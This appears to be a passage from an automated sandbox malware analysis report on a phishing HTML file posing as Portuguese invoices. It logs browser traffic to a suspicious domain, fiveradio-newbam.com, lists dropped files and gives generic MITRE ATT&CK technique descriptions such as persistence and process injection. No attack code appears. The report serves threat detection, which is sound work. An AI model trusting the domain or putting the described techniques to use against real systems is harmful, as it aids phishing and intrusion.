2024-06-28 07:26:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:12 UTC	413	OUT	GET /socket.io/?EIO=4&transport=polling&t=P1TlBzD&sid=n9v-59KTv8aKOUjkACUR HTTP/1.1 Host: fiveradio-newbam.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:12 UTC	617	IN	HTTP/1.1 400 Bad Request Date: Fri, 28 Jun 2024 07:26:12 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5LL%2BLj9FtL255ms6XG5KXH%2FlzKiIJeuKMbavLJH7DjdKC8Uw01%2FtU5CGh2AIBwtCRukQAEPShO2mGcBjwqdNT4Bnw9HlpeVAiYXvaF0FgwDOHsVZ5jqVpKN3x7I1eWRK2BeDbakGZA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89abf27e6b004382-EWR alt-svc: h3=":443"; ma=86400
2024-06-28 07:26:12 UTC	47	IN	Data Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a Data Ascii: 29{"code":1,"message":"Session ID unknown"}
2024-06-28 07:26:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report faturas_dsp.qs.pt_Wednesday, June 5, 2024.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 126

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Chrome Cache Entry: 130

Chrome Cache Entry: 131

Chrome Cache Entry: 132

Chrome Cache Entry: 133

Chrome Cache Entry: 134

Chrome Cache Entry: 135

Chrome Cache Entry: 136

Chrome Cache Entry: 137

Chrome Cache Entry: 138

Chrome Cache Entry: 139

Static File Info

Windows Analysis Report
faturas_dsp.qs.pt_Wednesday, June 5, 2024.html

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:12 UTC	557	OUT	OPTIONS /report/v4?s=ij3e8zh4vqIdvpBudfGCZOfbonEZ0LEAEGOJ%2FXtjWv5sEiE0Wi%2FMK1O4DTnZA6Sk1s%2FG8Pj%2Bac7zvycnyMNSZGhhVNkAnZ1Ot2Tf%2BzJMTRDtsatn5HBlc2RZjCNVfm7QZWZU%2BmMUMA%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://fiveradio-newbam.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:12 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Fri, 28 Jun 2024 07:26:12 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:12 UTC	494	OUT	POST /report/v4?s=ij3e8zh4vqIdvpBudfGCZOfbonEZ0LEAEGOJ%2FXtjWv5sEiE0Wi%2FMK1O4DTnZA6Sk1s%2FG8Pj%2Bac7zvycnyMNSZGhhVNkAnZ1Ot2Tf%2BzJMTRDtsatn5HBlc2RZjCNVfm7QZWZU%2BmMUMA%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 460 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:12 UTC	460	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 32 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 39 36 2e 31 35 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 76 65 72 61 64 69 6f 2d 6e 65 77 62 61 Data Ascii: [{"age":0,"body":{"elapsed_time":628,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.196.150","status_code":400,"type":"http.error"},"type":"network-error","url":"https://fiveradio-newba
2024-06-28 07:26:12 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Fri, 28 Jun 2024 07:26:12 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:46 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FLSA+llPh9RxhO4&MD=CDP8dsfS HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-06-28 07:26:46 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 173fb753-2eb8-4431-8183-98a7b4cf32f6 MS-RequestId: d274f65e-c30d-48fe-a7a2-135e1ecd8f21 MS-CV: h/0/opLwl0+8DrdQ.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 28 Jun 2024 07:26:46 GMT Connection: close Content-Length: 30005
2024-06-28 07:26:46 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-06-28 07:26:46 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:27:12 UTC	551	OUT	OPTIONS /report/v4?s=5LL%2BLj9FtL255ms6XG5KXH%2FlzKiIJeuKMbavLJH7DjdKC8Uw01%2FtU5CGh2AIBwtCRukQAEPShO2mGcBjwqdNT4Bnw9HlpeVAiYXvaF0FgwDOHsVZ5jqVpKN3x7I1eWRK2BeDbakGZA%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://fiveradio-newbam.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:27:12 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Fri, 28 Jun 2024 07:27:12 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:27:12 UTC	488	OUT	POST /report/v4?s=5LL%2BLj9FtL255ms6XG5KXH%2FlzKiIJeuKMbavLJH7DjdKC8Uw01%2FtU5CGh2AIBwtCRukQAEPShO2mGcBjwqdNT4Bnw9HlpeVAiYXvaF0FgwDOHsVZ5jqVpKN3x7I1eWRK2BeDbakGZA%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 464 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:27:12 UTC	464	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 35 39 33 37 37 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 33 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 39 36 2e 31 35 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 76 65 72 61 64 69 6f 2d 6e Data Ascii: [{"age":59377,"body":{"elapsed_time":632,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.196.150","status_code":400,"type":"http.error"},"type":"network-error","url":"https://fiveradio-n
2024-06-28 07:27:13 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Fri, 28 Jun 2024 07:27:12 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Target ID:	0
Start time:	03:25:56
Start date:	28/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\faturas_dsp.qs.pt_Wednesday, June 5, 2024.html
Imagebase:	0x7ff7f9810000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre